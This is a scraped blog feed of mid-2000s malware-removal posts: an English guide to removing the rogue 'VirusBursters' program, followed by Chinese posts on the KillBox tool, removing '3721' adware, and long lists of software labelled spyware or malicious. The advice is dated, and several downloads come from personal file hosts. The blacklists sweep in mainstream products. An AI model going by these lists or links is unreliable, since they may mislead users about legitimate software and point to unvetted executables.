(Only needed for manual fix)<br /><br /><br />Symptoms in a HijackThis Log:<br /><br />O4 - HKLM\..\Run: [VirusBursters] C:\Program Files\VirusBursters\virusbursters.exe /h<br />O4 - HKLM\..\Run: [VirusBurster] C:\Program Files\VirusBurster\virusburster.exe /h<br />O4 - HKLM\..\Run: [Virus-Bursters] C:\Program Files\Virus-Bursters\virus-bursters.exe /h<br /><br /><br />Add/Remove Programs control panel entry:<br /><br />VirusBursters 6.2<br />Virus-Bursters 6.3<br />VirusBurster 6.3<br /><br />Guide Updates:<br /><br />10/29/06 - Initial guide creation.<br />10/29/06 - Added automated removal via SmitFraudFix<br />12/12/06 - Added information about VirusBurster (same program)<br /><br /><br />Choose the removal method you would like to use:<br /><br /> * Automated Removal (Easier, but requires a working Internet connection.)<br /> * Manual Removal (Does not require a working Internet Connection and should be used if automated method does not work.)<br /><br />Automated Removal Instructions for VirusBursters and VirusBurst:<br /><br /> Print out these instructions as we will need to close every window that is open later in the fix.<br /><br /> Download SmitfraudFix.exe from here and save it to your desktop:<br /><br /> SmitFraudFix.exeConfirm that the file SmitfraudFix.exe now resides on your desktop, but do not double-click on the icon as of yet. We will use it in later steps. The icon will look like the one below:<br /><br /><br /><br /><br /> Next, please reboot your computer into Safe Mode by doing the following:<br /><br /> Restart your computer<br /><br /> After hearing your computer beep once during startup, but before the Windows icon appears, press F8.<br /><br /> Instead of Windows loading as normal, a menu should appear<br /><br /> Select the first option, to run Windows in Safe Mode.<br /><br /> 1. When you are at the logon prompt, log in as the user you were performing the previous steps as.<br /> When your computer has started in safe mode, and you see the desktop, close all open Windows.<br /><br /> Now, double-click on the SmitFraudfix icon that should be residing on your desktop.The icon will look like the one below:<br /><br /><br /><br /> When the tool first starts you will see a credits screen. Simply press any key on your keyboard to get to the next screen.<br /><br /> You will now see a menu as shown in the image below. Press the number 2 on your keyboard and the press the enter key to choose the option Clean (safe mode recommended).<br /><br /><br /><br /><br /> The program will start cleaning your computer and go through a series of cleanup processes. When it is done, it will automatically start the Disk Cleanup program as shown by the image below.<br /><br /><br /><br /><br /><br /> This program will remove all Temp, Temporary Internet Files, and other files that may be leftover files from this infection. This process can take up to a few hours depending on your computer, so please be patient. When it is complete, it will close automatically and you will should continue with step 11.<br /><br /> When Disk Cleanup is finished, you will be presented with an option asking Do you want to clean the registry ? (y/n). At this screen you should press the Y button on your keyboard and then press the enter key.<br /><br /><br /> When this last routine is finished, you will be presented with a red screen stating Computer will reboot now. Close all applications. You should now press the spacebar on your computer. A counter will appear stating that the computer will reboot in 15 seconds. Do not cancel this countdown and allow your computer to reboot.<br /> 1. Once the computer has rebooted, you will be presented with a Notepad screen containing a log of all the files removed from your computer. Examine this log, and when you are done, close the Notepad screen.<br /><br />Your computer should now be free of the VirusBursters, Virus-Bursters and VirusBurster infection.<br /><br />If you are still having problems with spyware after completing these instructions, then please follow the steps outlined in the topic linked below:<br /><br />Preparation Guide For Use Before Posting A Hijackthis Log<br /><br /><br /><br />Manual Removal Instructions for VirusBursters and VirusBurst:<br /><br />These steps may appear to be long and daunting. They are, though, quite easy to do and consist of so many steps only because I have written them in an extremely detailed manner.<br /><br /> Print out these instructions as we will need to close every window that is open later in the fix.<br /><br /> Download FixVBS.reg to your desktop by right clicking on the following link and then selecting Save Link As or Save File as, depending on your browser.<br /><br /> FixVBS.reg Download Link<br /><br /> Confirm that the file FixVBS.reg now resides on your desktop as we will need it later.<br /><br /> Download SmitfraudFix.exe from here and save it to your desktop:<br /><br /> SmitFraudFix.exeConfirm that the file SmitfraudFix.exe now resides on your desktop, but do not double-click on the icon as of yet. We will use it in later steps. The icon will look like the one below:<br /><br /><br /><br /> Go to your desktop and double click on the FixVBS.reg file that you downloaded earlier. When it asks if you would like to merge the information, press the Yes button and then the OK button.<br /><br /> Click on the Start button and then select the Run option.<br /><br /> In the Open: field type c:\windows\system32 and then press the OK button.<br /><br /> When the folder appears, if it says These files are hidden, click on the Show the contents of this folder option.<br /><br /> We now need to make it so you can see hidden files.<br /> 1. Click on the Tools menu and select Folder Options. Click on the View tab. Under the Hidden files and folders category select Show hidden files and folders. Uncheck Hide protected operating system files. Press Apply and then OK.<br />Scroll through the list of files in this folder and look for rrtcany.dll. Right-click on rrtcany.dll and select rename. Rename the file to rrtcany.dll.bad.<br /><br />Look for the file veklo.dll and rename the file to veklo.dll.bad.<br /><br />Look for the file okkmtv.dll and rename the file to okkmtv.dll.bad.<br /><br />Look for the file impgsje.dll and rename the file to impgsje.dll.bad.<br /><br />Look for the file sacskza.dll and rename the file to sacskza.dll.bad.<br /><br />Look for the file cfltygd.dll and rename the file to cfltygd.dll.bad.<br /><br />Look for the file jbtazy.dll and rename the file to jbtazy.dll.bad.<br /><br />Look for the file fmrmhc.dll and rename the file to fmrmhc.dll.bad.<br /><br />Look for the file dcvwaah.dll and rename the file to dcvwaah.dll.bad.<br /><br />Look for the file oebxpba.dll and rename the file to oebxpba.dll.bad.<br /><br />Look for the file xxfgmy.dll and rename the file to xxfgmy.dll.bad.<br /><br />Look for the file tpedvf.dll and rename the file to tpedvf.dll.bad.<br /><br />Look for the file dbqlrij.dll and rename the file to dbqlrij.dll.bad.<br /><br />Look for the file vcehaeb.dll and rename the file to vcehaeb.dll.bad.<br /><br />Look for the file xqpauzx.dll and rename the file to xqpauzx.dll.bad.<br /><br />Look for the file mlraakb.dll and rename the file to mlraakb.dll.bad.<br /><br />Look for the file qrzsyr.dll and rename the file to qrzsyr.dll.bad.<br /><br />Note: Please rename any of the above files that you may find. If you do not find any of these files, then you should post a note about it in the Am I Infected? forum.<br /><br />After you rename the file, you can close the System32 folder window.<br /><br /> 1. Next, please reboot your computer into Safe Mode by doing the following:Restart your computer<br /><br /> After hearing your computer beep once during startup, but before the Windows icon appears, press F8.<br /><br /> Instead of Windows loading as normal, a menu should appear<br /><br /> Select the first option, to run Windows in Safe Mode.<br /> 2. When you are at the logon prompt, log in as the same user which you had done the previous steps.When your computer has started in safe mode and you see the desktop, click on the Start Menu button.<br /><br /> Click on the Control Panel option.<br /><br /> Double-click on the Add or Remove Programs icon.<br /><br /> Find the entries for VirusBursters 6.2, Virus-Bursters 6.3 or VirusBurster 6.3 and double-click on it to uninstall them if found. Follow the prompts to uninstall the program, but do not allow it to reboot the computer if it asks.<br /><br /> When it has completed uninstalling you can close Add or Remove Programs and your Control Panel.<br /><br /> Delete the following files and folders (Do not be concerned if this folder does not exist):<br /><br /> C:\Windows\System32\rrtcany.dll<br /> C:\Windows\System32\veklo.dll<br /> C:\Program Files\VirusBursters\<br /> C:\Program Files\Virus-Bursters\<br /> C:\Program Files\VirusBurster\<br /> C:\Windows\System32\okkmtv.dll.bad<br /> C:\Windows\System32\impgsje.dll.bad<br /> C:\Windows\System32\sacskza.dll.bad<br /> C:\Windows\System32\jbtazy.dll.bad<br /> C:\Windows\System32\cfltygd.dll.bad<br /> C:\Windows\System32\fmrmhc.dll.bad<br /> C:\Windows\System32\dcvwaah.dll.bad<br /> C:\Windows\System32\oebxpba.dll.bad<br /> C:\Windows\System32\xxfgmy.dll.bad<br /> C:\Windows\System32\tpedvf.dll.bad<br /> C:\Windows\System32\dbqlrij.dll.bad<br /> C:\Windows\System32\vcehaeb.dll.bad<br /> C:\Windows\System32\xqpauzx.dll.bad<br /> C:\Windows\System32\mlraakb.dll.bad<br /> C:\Windows\System32\qrzsyr.dll.bad<br /><br /> Close all open Windows.<br /><br /> Now, double-click on the SmitFraudfix icon that should be residing on your desktop.The icon will look like the one below:<br /><br /><br /><br /> When the tool first starts you will see a credits screen. Simply press any key on your keyboard to get to the next screen.<br /><br /> When the tool first starts you will see a credits screen. Simply press any key on your keyboard to get to the next screen.<br /><br /> You will now see a menu as shown in the image below. Press the number 2 on your keyboard and the press the enter key to choose the option Clean (safe mode recommended).<br /><br /><br /><br /><br /> The program will start cleaning your computer and go through a series of cleanup processes. When it is done, it will automatically start the Disk Cleanup program as shown by the image below.<br /><br /><br /><br /><br /><br /> This program will remove all Temp, Temporary Internet Files, and other files that may be leftover files from this infection. This process can take up to a few hours depending on your computer, so please be patient. When it is complete, it will close automatically and you will should continue with step 25.<br /><br /> When Disk Cleanup is finished, you will be presented with an option asking Do you want to clean the registry ? (y/n). At this screen you should press the Y button on your keyboard and then press the enter key.<br /><br /><br /> When this last routine is finished, you will be presented with a red screen stating Computer will reboot now. Close all applications. You should now press the spacebar on your computer. A counter will appear stating that the computer will reboot in 15 seconds. Do not cancel this countdown and allow your computer to reboot.<br /> Once the computer has rebooted, you will be presented with a Notepad screen containing a log of all the files removed from your computer. Examine this log to see what files were found, and when you are done, close the Notepad screen.<br /> 3. We next perform an online scan with Panda to find any possible inactive remnants from this infection: Panda OnlineOnce you are on the Panda site click the Scan your PC button<br /><br /> A new window will open...click the Check Now button<br /><br /> Enter your Country<br /><br /> Enter your State/Province<br /><br /> Enter your e-mail address and click send<br /><br /> Select either Home User or Company<br /><br /> Click the big Scan Now button<br /><br /> If it wants to install an ActiveX component allow it<br /><br /> It will start downloading the files it requires for the scan (Note: It may take a few minutes)<br /> 4. When download is complete, click on Local Disks to start the scan<br /> 5. When the online scan has been completed, let it remove what it finds, and then you can close Internet Explorer.<br /> 6.<br /><br /> Your computer should now be free of the VirusBursters, Virus-Bursters, and VirusBurster infection<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-4879995283025376124?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-88669098582727348282007-08-22T01:44:00.004-07:002007-08-22T01:45:06.018-07:00KillBox 刪除檔案器KillBox 刪除檔案器<br /><br />軟體名稱:KillBox 刪除檔案器<br />【KillBox 是國外反病毒論壇很受歡迎的工具軟體】<br />KillBox 實質是一個刪除任意檔案的利器,它不管這個檔案是EXE還是DLL等其它檔案,也不管這個檔案是正在執行中,還是被系統調用了,KillBox 都可以簡單幾步就將檔案刪除。<br />正因如此,KillBox 在反病毒方面使用非常之棒。現時流行類病毒(蠕蟲、木馬)很多均為單獨的病毒檔案,與系統無關,可以安全刪除此類病毒檔案。但在刪除過程,由於病毒的狡滑,總是很難刪除,這連國際知名安全軟體產商也推薦在安全模式殺毒。<br />有了 KillBox ,一切變得簡單多了,首先確認了這是病毒的檔案,再填上病毒檔案的完整路徑,或通過瀏覽選取此病毒檔案,按程式裡的那個X圖示(並不是右上角的那個喔~)就行了(某些病毒可能需要重啟電腦)。<br />下載點 (1) <a href="http://tokyo.cool.ne.jp/tw0416/KillBox.exe" target="_blank">http://tokyo.cool.ne.jp/tw0416/KillBox.exe</a> <br /> (2) <a href="http://www.badongo.com/file/3420415" target="_blank">http://www.badongo.com/file/3420415</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-8866909858272734828?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-63026059190887415932007-08-22T01:44:00.003-07:002007-08-22T01:44:50.884-07:003721網路實名解決方法近來瀏覽大陸網站的常見問題,未來,此類的程式可能會層出不窮,請各位讀者小心。<br />首先,這種程式並不是「病毒」,只是很像病毒的形式而已。這個被稱為「3721網路實名」的程式,會在你瀏覽一些入口網站時,不知不覺地被安裝上去。這屬 於支援IE瀏覽器的外掛程式,主要是「3721網路實名」開發的,主要的目的是提供入口網站更多的功能。雖然這些入口網站和3721公司是本著商業行為的 標準形式,但片面地為用戶安裝這個外掛程式就有點不道德了!3721其實就象一個114查號臺,或者象一個全國都在廣泛使用的電話號碼本,實際上是把黃 頁、搜索引擎和軟體這三種技術結合到一起,提供了一個讓企業客戶迅速找到企業的快速通道,它類似病毒的行為,主要是它一開機就自動啟動,為IE增加一些功 能,但偶爾會使系統運行時,產生不穩定的情況,連帶著影響到上網的速度。有時候關機時會出現「explorer.exe」錯誤的浮現視窗。另外,電腦每次 重新開機時,有機會會出現「載入C:windowsdownlo~1cnsmin.dll時錯誤,系統找不到指定的檔案。」<br /><br />最大的問題就是這個「3721網路實名」,由於程式特殊設計的關係,它是完全沒有移除功能的!有興趣的讀者,這裏執筆人給你看看它的程式原始碼,看得出來 它不是木馬程式和病毒,但是只要透過msconfig關閉功能,或是更動regstry都沒有用,會自動「變身」,換個名字繼續啟動,所以永遠刪除不掉!<br /><br />‧ 怎麼樣知道自己有沒有「中標」?<br /><br />1.使用「msconfig」系統組態管理工具,關閉「jkhajkd.exe」類似的程式,重開機之後,它又會以另外一個名字出現。<br /><br />2.只要啟動IE後,選擇工具選項後,在「進階」設定裡看到這個選項,就知道你「中標了」。即使你把這些功能的選項打勾都取消也沒用。<br /><br />3.IE工具列上莫名奇妙多了一些(上網助手)的按鈕。<br /><br />1.預防3721網路實名(上網助手)軟件<br />下載:<a href="http://web.umr.edu/%7Echiuy/anti3721etc.exe" target="_blank">http://web.umr.edu/~chiuy/anti3721etc.exe</a><br />2.刪除3721網路實名(上網助手)軟件<br />下載:<a href="http://home.pchome.com.tw/my/u7501150/3721.exe" target="_blank">http://home.pchome.com.tw/my/u7501150/3721.exe</a><br /><br />3.手動移除方法<br /><br />這個網頁程式的有趣之處,就是當你連結到包含此程式碼的網頁,它會自動使用「Rundll32.exe」連結程式庫,此時系統是無法終止 Rundll32.exe執行,因為這是系統重要的執行程序。因此,要刪除它,一定得重新啟動電腦,一直按下<CTRL>,選擇進入安全模式 「SAFEMODE」才可以。<br /><br />●詳細的方法如下:<br /><br />1、進入安全模式後,使用regedit這個指令,修改windows系統的regedit,唯有這個方法可以移除網絡實名的程式。<br /><br />2、首先先進入以下的機碼字串,「HKEY_LOCAL_MACHINESOFTWAREMicrosoftWin@@@@@02-14in.dll,Rundll32」<br />3、接著,移動到 「HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternetExplorerAdvancedOptions」這一串 值,將目錄「!CNS 」刪除掉,它是讓Internet選項中的進階設定頁有「3721網絡實名」的選項。<br />4、再來,分別進入「HKEY_LOCAL_MACHINESOFTWARE3721」與「HKEY_CURRENT_USERSoftware3721」,將整個目錄「3721」刪除。<br />5、另外,「HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain」下有關「CNS」的值都要刪除,這邊給讀者一個方便的作法,就是用這個程式的尋找功能,將所有有關「CNS」的值都刪除掉。<br />6、在刪除完註冊表中的數值之後,還需要刪除存儲在硬碟中的3721網絡實名檔案,最簡單的方式,也是利用搜尋的方式,將所有在C:WINNTDOWNLO~1 或 C:WINDOWSDOWNLO~1 下包含「cns」的檔案都刪除掉。<br />只要你在安全模式下把這些檔案和註冊值都清除,那麼重新啟動電腦,進入正常模式後,就不會有「3721」網絡實名再來煩你了。<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-6302605919088741593?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-66556277343013621632007-08-22T01:44:00.001-07:002007-08-22T01:44:30.603-07:00500多個惡意軟體名單和網站名稱ab365實用網址<br />ACCOONA 工具欄<br />AccoonaSearchAssistant<br />ACCOONA工具欄<br />ADDeliverer<br />Adlove818廣告彈窗<br />ADNavihepler(女生宿舍)<br />ADO廣告插件<br />ADSL優化大師1.0<br />AdvSC32廣告插件<br />Alexa工具條<br />Alibaba商機直通車<br />Aliedit<br />Alsmt<br />baigoo百狗搜索<br />BaisoLoader<br />BaomaoToolbar<br />BestToolbars<br />BitComet搜索條Browsemzero<br />BrowserHelper Classe<br />BtSerach&VVN廣告<br />Bysoo 百搜工具條<br />BysooTB<br />Bysoo百搜工具條<br />Bysoo工具欄<br />ClockSync<br />CNIC中文上網<br />Cnnic無憂上網工具條<br />CNNIC中文上網導航<br />CnsMin聯眾世界(捆綁卸載)<br />CoolSign<br />CopySo拷貝搜<br />CpapView廣告插件<br />CyAdware<br />Deskipn桌面傳媒<br />DiggToolbar<br />DIY彩秀<br />Dmad互動娛樂平台_is1<br />DMCast桌面傳媒<br />DMCast桌面傳媒/IEBAR<br />DmPlay彈廣告軟體<br />DoDoorRss<br />DTservice<br />DTSVC<br />Dudu下載加速器<br />DxkrFiledownload<br />EastBox音樂之王<br />EbayDay工具條<br />EbayShop<br />eBay 易趣工具條EliteBar<br />enternet.exe廣告軟體<br />EPSONWebPrinterSelfTestControlClass<br />estAlive<br />ET網路視頻電話<br />EyeOn IE class<br />Flashbar_Classic<br />Funcwin<br />GoogleDesktop<br />GoogleTalk<br />Google網路加速器<br />Google新工具條Gotel網路電話<br />Hao123<br />HarrySou ToolBar(哈利引擎)<br />hbhelper(酷客娛樂平台)<br />hbToolsOutlookTools<br />Hotbar工具條<br />Hupoo<br />HyperBar<br />iBar工具條<br />IEbar2<br />IEBAR桌面傳媒<br />IEHlprObj<br />IELORER木馬<br />ieress.dll惡意插件<br />IE伴郎<br />IE修復專家ikankan<br />iMop_is1<br />Infofo珊瑚蟲工具欄<br />InsII<br />InsII&III<br />ipprotect<br />Is88<br />ISC廣告插件<br />iShare<br />iShareMMSSender<br />Jekr工具條<br />Jisooo<br />K12控件包<br />K65<br />KincentQ<br />KooWo<br />KuGoo(酷狗)EbayShop<br />Kuhoapplication(酷猴)<br />Kuro(酷樂)<br />letscool<br />LightFrame3IECOM<br />Looked<br />lsass 木馬<br />Man彈窗廣告<br />MCQ<br />Media Access廣告軟體<br />MediaResource<br />miphone小蜜蜂<br />MMSassist彩信與Winstdup<br />MSIbm<br />Mskey32<br />MSN搜索工具條<br />Msq木馬<br />MSser<br />MSService<br />MyIEHelper<br />MyIEtoolbar<br />MyRXJH<br />Mysee2_在線電視<br />My網蜜天天搜索<br />navangel也是流氓軟體<br />NavExcel Adware<br />Nav網路導航<br />NB46工具條<br />NBBho<br />NetAccelerate惡意插件<br />Netbus<br />NetbusToolbar<br />NetFish網路釣魚克星<br />New<br />New.net<br />NTService廣告<br />p8數位娛樂傳播平台<br />PcastP2P流媒體控件<br />POCO安裝程式<br />POCO在線雜誌播放插件_is1<br />PopupBlockerPro7.0.5<br />POTU周博通資訊閱讀器<br />PPLive電視<br />PPRich<br />ppStream<br />PP點點通搶佔器<br />pubwinep客戶端捆綁百度搜霸和一搜<br />qqedit<br />QQplugin<br />QQ表情<br />QQ珊瑚蟲 一連帶三個<br />QQ堂<br />QTV免費網路電影<br />quartz32<br />Rich Media<br />RichMeida<br />RooGoo”(人狗搜索),也叫“通用搜索<br />Router Layer<br />Rox&DTS廣告<br />SCIA<br />SeAD/DmAD<br />SearchNet<br />SearchNet(中搜地址欄搜索)<br />seotoolbar<br />ShareHelper<br />sinasearch新浪IE通<br />SmartNet<br />Sogou_VOD_在線電視<br />Sol099<br />SopCast<br />Sosobar搜搜工具條<br />Sougood娛樂之王<br />spoolsv遨迅<br />surfaccuracy<br />syscast<br />systems<br />systemswincup<br />T2BHO<br />TargetAD<br />Themeadp<br />Toolbar888<br />Trojan.Clciker.Bhoiea<br />TT33定向搜索<br />TuTu下載<br />TVUPlayer<br />U88財富快車工具條<br />Update2<br />UpdateService<br />UrlCom<br />VerysoToolbar<br />VGO播吧<br />VisionCommunicate彩信<br />VP視頻聊天客戶端控件<br />vvsetup<br />web3000<br />WebACC<br />webacc插件<br />WebMisc<br />Webwork<br />WinCtlAd<br />wincup<br />WinDirect2.0<br />windows adtools<br />WinSC廣告插件<br />WinStdup<br />winsurvey(MSIBM)<br />WinWrCup<br />Wowo<br />Wshcon<br />wz101<br />XBar<br />Xbar圖鈴隨E下<br />xintv<br />lus<br />Yahoo!DesktopSearch<br />Yahoo!Toolbar<br />Yahoo!雅虎通<br />Yahoo助手(原3721)<br />Yayad<br />Yayad廣告<br />Yoday<br />YOK超級搜索<br />YOK工具條<br />YOK廣告插件攔截<br />ZCOM暴風娛樂<br />ZCOM電子雜誌<br />ZCOM娛樂平台<br />ZDAWebMisc天網廣告軟體<br />阿彬搜索工具條<br />阿達連連看<br />阿哈工具條<br />阿里巴巴貿易通<br />阿秀搜索工具條<br />愛美思中文郵址<br />傲訊輔助瀏覽器<br />八樂音樂<br />百度超級搜霸<br />百度上網伴侶<br />百度搜索伴侶<br />百度下吧_is1<br />百度硬碟搜索2.3<br />百易漢字域名<br />棒小秘書<br />寶酷(BaoCue)2.20<br />暴風圖鈴通<br />比鄰下載<br />玻璃屋<br />播霸/貓眼網路電視迷你版<br />播霸PodcastbarMini<br />播霸貓眼網路電視迷你版<br />博採網摘<br />補上:roogoo通用搜索<br />彩信通<br />彩信助手<br />彩秀<br />彩炫圖鈴<br />藏鯨閣<br />超級播霸<br />超級劃詞搜索<br />超級蜜蜂<br />陳橋五筆,捆綁的是百度搜霸<br />初收穫工具條<br />楚天音樂網<br />詞霸豆豆<br />大多數網站有麟潤網路廣告,就算用TT也無法屏蔽。<br />典酷****<br />電鷹搜索<br />電影寶貝<br />電影新地<br />東海潮網路<br />動感下載地帶<br />嘟嘟加速器<br />短信狂人<br />多多QQ表情<br />多多視頻<br />番茄花園,捆綁易趣<br />訪問加速<br />飛翔網路媒體播放器<br />沸點網路電視<br />分類GG<br />風雷影音搜索<br />個最惡意的中文網站,千萬不要試<br />購物搜索<br />股票投資智慧網站********<br />股市指南針<br />廣東互聯星空CertInstallControl<br />廣告攔截專家<br />桂林寬頻<br />哈利引擎<br />漢化新世紀<br />浩方對戰平台<br />浩方對戰平台(雅虎助手.劃詞搜索.3721還有幾個沒見過的<br />很棒客戶端<br />很棒通行證<br />很棒小秘書<br />紅與黑駭客********<br />紅與黑駭客基地<br />宏傑工具之文件夾密1098<br />宏網超級搜霸<br />虎翼DIY吧<br />劃詞搜索<br />灰鴿子<br />灰色天空<br />貨比多家<br />機器貓大結局<br />雞毛信<br />激動在線影院:<br />極品數字網路電視<br />簡單遊<br />金貝殼網路電視<br />金盒子MultiUpload<br />金山安全助手<br />金山產品下載器<br />九尋音樂音樂搜索伴侶軟體1<br />九贏網路廣告聯盟<br />開山網路電視王<br />開心運程速遞插件<br />看天下新聞資訊瀏覽器<br />空中網彩信通<br />酷寶<br />酷猴<br />酷猴寬頻<br />酷客娛樂平台<br />酷熱影音<br />酷站導航<br />酷站工具條<br />酷桌面<br />快so2<br />快搜<br />快搜<br />藍天語音視頻插件7.0<br />藍天語音視頻聊天室插件<br />樂霸<br />蓮塘語音<br />聯媒直投<br />流星網路電視<br />落雪下載器<br />麥秀MsToolbar<br />貓眼網路電視<br />貓仔隊<br />每步直達網址<br />美達網路電視<br />美女寫真網<br />美萍MP3音樂搜索專家<br />迷你PP<br />迷你迅雷<br />免費電影專家<br />魔幻盒子安裝程式<br />你來我網<br />女生宿舍<br />碰碰網<br />屁屁狗2.0正式版<br />錢龍網<br />親親娛樂伴侶<br />青年在線<br />青娛樂<br />青娛樂軟體<br />全國報紙天天免費讀<br />全新QQ表情伴侶5.2<br />人人商務網<br />人人網摘<br />日月精華<br />如意搜<br />塞我網CyworldChina<br />閃電搜霸Flashbar閃電郵件直通車<br />上網導航條2.6<br />設計中國工具條<br />實用網址導航(酷站導航)<br />使用搜索<br />世紀軟體園<br />世界網路工具條<br />視野工具條<br />水晶搜索<br />私人磁碟<br />搜狗<br />搜狗直通車<br />搜狐靈狐通<br />搜狐遊戲也是流氓<br />搜搜soso工具欄<br />搜搜工具條(SOSO)<br />搜一搜<br />搜易財富火箭<br />搜易網彈出廣告<br />搜悠工具條<br />太極天下搜索<br />淘寶網<br />淘寶旺旺<br />騰訊TT瀏覽器<br />騰訊極速下載控件<br />網易泡泡快速下載工具<br />網易搜霸<br />網遊天使自助遠程掛機平台<br />網址極限<br />唯刊Vika閱讀器<br />文件夾保護2006<br />廈新電子<br />小蜜蜂<br />新WinStudup<br />新版Alexa工具條<br />新版DuDu下載加速器<br />新版網路豬<br />新釣魚克星(netfish)1.28<br />新華快信<br />新劃詞搜索<br />新疆旅遊網<br />新浪IE通<br />新浪iGame遊戲大廳<br />新浪iGAME遊戲總動園<br />新浪UC2006世界杯版<br />新浪vivi收藏夾<br />新浪點點通<br />新浪了了吧<br />新浪搜索條<br />新網路豬<br />新雅虎助手<br />新桌面媒體<br />星辰娛樂在線<br />幸福生活<br />虛擬光碟機DAEMONTools捆綁廣告插件<br />炫彩圖鈴DIY<br />迅彩圖鈴通<br />雅虎360搜<br />雅虎助手<br />亞洲美圖<br />亞洲美圖聯盟<br />夜傾情<br />一搜工具條<br />億多多<br />易虎<br />易捷電子雜誌<br />易趣工具欄<br />易趣購物<br />易趣購物2006<br />易趣購物按鈕<br />易趣購物工具條<br />易趣小精靈<br />易搜搜索引擎<br />易玩通娛樂平台<br />音標[時尚搜索]<br />贏政天下網摘<br />影視經典<br />勇芳QQ遊戲記牌器也有捆綁<br />幽幽桌面網<br />悠視影音播放器(UUPlayer)_is1<br />娛樂明星網,<br />娛樂心空<br />娛樂助手<br />玉女山莊<br />豫通互聯互通網關電信版2.0<br />豫通互聯互通網關網通版2.0<br />緣分天空<br />直達網址<br />中國電信的星空互聯<br />中國共享軟體嵌入式廣告<br />中國花網<br />中國商務呼叫中心<br />中國通<br />中搜IG客戶端<br />中搜地址欄搜索<br />中網媒體速遞<br />桌面傳媒<br />桌面傳媒(Desktopmedia)<br />桌面酷<br />自由鳥工作室<br />自由行中文域名<br />左看在線<br />008文件分割合併器<br />0769cnToolBar<br />1000e<br />123工具條<br />139LOVE<br />159搜索工具條<br />159通用搜索<br />17key.net Winkld<br />17lele網遊<br />31G上網直通車<br />360搜<br />3721上網助手<br />3721搜索助手<br />3721網路實名<br />3721下載專家<br />50精品網<br />51888彩信助手<br />5460ToolBar<br />5566上網修復<br />5kee(Do55)<br />668企業通道工具欄<br />77250搜索助理<br />7BCOM<br />8848購物搜索<br />8888插件<br />88data桌面搜索<br />88DogWinKalendar工具條<br />88Vod插件<br />A9Toolbar<br />天鋒影視娛樂平台_Ver.20040416<br />天氣預報<br />天天搜索/My網蜜<br />天天在線<br />天網廣告<br />天網搜索<br />天下搜<br />鐵通REDVIP網路電話<br />通視超級衛星網路電視<br />同花順工具條<br />哇靠網<br />哇哇資訊精靈<br />完美解碼多語言版<br />完美網譯通<br />萬國免費網路影院<br />萬能五筆.捆的COPY搜<br />萬象網管捆綁了中文上網和一搜工具條。<br />萬眾閱讀器<br />網際快車1.73(太平洋下的)IEbar<br />網際狂搜Ver3.1專業版<br />網路釣魚克星<br />網路精靈NetFairy2004<br />網路實名<br />網路豬<br />網眼天下WebEye<br />網譯通<br />網易SMSPpinstallControl<br />Yahoo<br />Msn<br />google<br />ebay<br />sina<br />的toolbar 都有 spyware<br />天下真的冇Free Lunch<br />彈出廣告<br />或張收到的email<br />1毫子一個賣出去<br />一個月有都有過100000元<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-6655627734301362163?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-3281694330870659572007-08-22T01:43:00.000-07:002007-08-22T01:44:03.651-07:00含有偷窺程式的軟體名單MoonWalker (2000/05/17)<br />FlashGet (2000/04/21)<br />Corel WordPerfect Suite 8 OEM (2000/04/18)<br />CD Extractor by Rosoft Engineering (2000/04/16)<br />GetRight 4.02 (有選項可不裝Spyware 2000/04/16)<br /><br /><br />( update 2000/8/21) [NEW]<br /><br />1 ClickWebSlideShow<br />123Search<br />123Search 2<br />15 Puzzle 2.1<br />20/20<br />3d Anarchy<br />3D-FTP 3.0<br />3rd block 2.0<br />3S Accounting<br />3SI Accounting & Inventory Management (Demo) 2.0<br />5star Free Lines 1.2<br />7way 0.15<br /><br />Aaron's WebVacuum 0.8f<br />Abe's FTP Client<br />Abe's Image Viewer 1.1<br />Abe's MP3 Finder 4.0<br />Abe's Picture Finder 1.4<br />Abe's SMB Client<br />Absolute Telnet 1.63<br />Access Diver III<br />Ace of Humor 1.0<br />AceNotes Free 2000c<br />Acorn Email 2.5<br />AcqURL 3.1<br />ActionOutline Light 1.6<br />Active 'Net 1.0<br /><br />Add URL 1.0<br />Add/Remove Plus! 1.1<br />Address Rover 98<br />Admiral VirusScanner 1.0<br />Advanced Call Center 2.9<br />Advanced Internet Tool 2.2.2<br />Advanced Maillist Verify 1.6<br />Advertisement Wizard<br />AdWizard<br />AdWizard 1.0<br />Alchemy Anaconda<br />Alive and Kicking 3.1<br />AllNetic WWW and FTP Observer<br />AlphaScape Quick Paste<br />AnchorNet 1<br />Applet Game Mania 1.7<br />AskRalph<br />ASP1-A3 1.0<br />Auction Central 1.02<br />Auction Explorer<br />Aureate Group Mail 3.0<br />Aureate SpamKiller Free Edition<br />AutoFTP PRO 2.3<br />AutoWeb 1.0<br />AxelCD 2.1<br />AxMan<br />AxMan 3.11<br /><br />Beatle<br />bigEListener<br />Binary Boy 1.70<br />BinaryVortex 1.4<br />BizAgent 1<br />Blue Engine 1.0<br />BookSmith : Original 1.2<br />BuddyPhone 2.0<br />Bullseye Searcher 2.5<br /><br />Calypso E-mail 3.0<br />CamCollect 1.4c<br />CamGrab<br />Canasis vB vB-Beta<br />Capture Express 1.0<br />Capture Express 2000 1.0<br />Car Lot Web Site Creator 1<br />Carlanthano 2.9.868<br />Cascoly Screensaver 1.0<br />CD-AID 02.00.05.23<br />CDDB-Reader<br />CDMaster32 3.0<br />Centarsia 1.01<br />ChanStat 3.3<br />Charity Banner 1.0<br />Cheat Machine 3.1<br />Check&Get 1<br />Check4New 1.7<br />ChinMail 1.2<br />Clabra clipboard viewer 1.2<br 